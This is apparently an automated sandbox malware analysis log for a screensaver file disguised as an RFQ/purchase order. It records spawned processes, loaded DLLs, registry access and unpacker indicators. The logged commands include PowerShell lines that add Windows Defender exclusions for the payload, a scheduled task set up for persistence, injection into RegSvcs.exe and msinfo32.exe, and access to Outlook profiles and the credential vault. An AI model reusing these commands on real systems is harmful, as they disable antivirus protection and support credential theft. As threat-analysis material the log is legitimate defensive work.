                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\PEJmengI.exe C:\Users\user\AppData\Roaming\PEJmengI.exe
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\PEJmengI.exe C:\Users\user\AppData\Roaming\PEJmengI.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: odbc32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wdscore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptui.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: version.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: winnsi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dhcpcsvc.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrAutomated click: OK
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeAutomated click: OK
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ_P.O.1212024.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ_P.O.1212024.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: msinfo32.pdb source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb@ source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrNbohrgjTw.exe, 0000000B.00000000.379719754.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873854822.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: RegSvcs.pdb, source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002010000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396847773.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396514209.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002190000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.415871928.000000000094C000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: RFQ_P.O.1212024.scr, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: PEJmengI.exe.0.dr, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: sqlite3.dll.12.drStatic PE information: section name: /4
                Source: sqlite3.dll.12.drStatic PE information: section name: /19
                Source: sqlite3.dll.12.drStatic PE information: section name: /31
                Source: sqlite3.dll.12.drStatic PE information: section name: /45
                Source: sqlite3.dll.12.drStatic PE information: section name: /57
                Source: sqlite3.dll.12.drStatic PE information: section name: /70
                Source: sqlite3.dll.12.drStatic PE information: section name: /81
                Source: sqlite3.dll.12.drStatic PE information: section name: /92
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B31FD push esp; ret 0_2_001B3201
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040205D push esp; retf 8_2_0040206B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418830 push esi; ret 8_2_00418831
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004018CB pushad ; iretd 8_2_004018CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004148F3 push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040214A pushad ; ret 8_2_0040214E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401971 push ecx; ret 8_2_00401972
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041498F push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004149A0 push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D253 push cs; retf 8_2_0040D284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403290 push eax; ret 8_2_00403292
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004182BA pushfd ; retf 8_2_004182CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004073BB pushfd ; iretd 8_2_004073BD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408524 push 098F1E49h; ret 8_2_00408529
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401D82 push ecx; ret 8_2_00401D83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401DA0 push ebp; iretd 8_2_00401DB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00411DA3 push FFFFFFFFh; ret 8_2_00411DA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040164A push ecx; ret 8_2_0040164B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041464D push esi; retf 8_2_0041464E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004016C8 push ecx; ret 8_2_004016C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418F4D push edi; ret 8_2_00418F5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418F53 push edi; ret 8_2_00418F5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041872A push cs; ret 8_2_0041872C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418F98 push A1C798CCh; ret 8_2_00418F9E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096DFA1 push ecx; ret 8_2_0096DFB4
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D31F5 push esp; ret 10_2_001D31F9
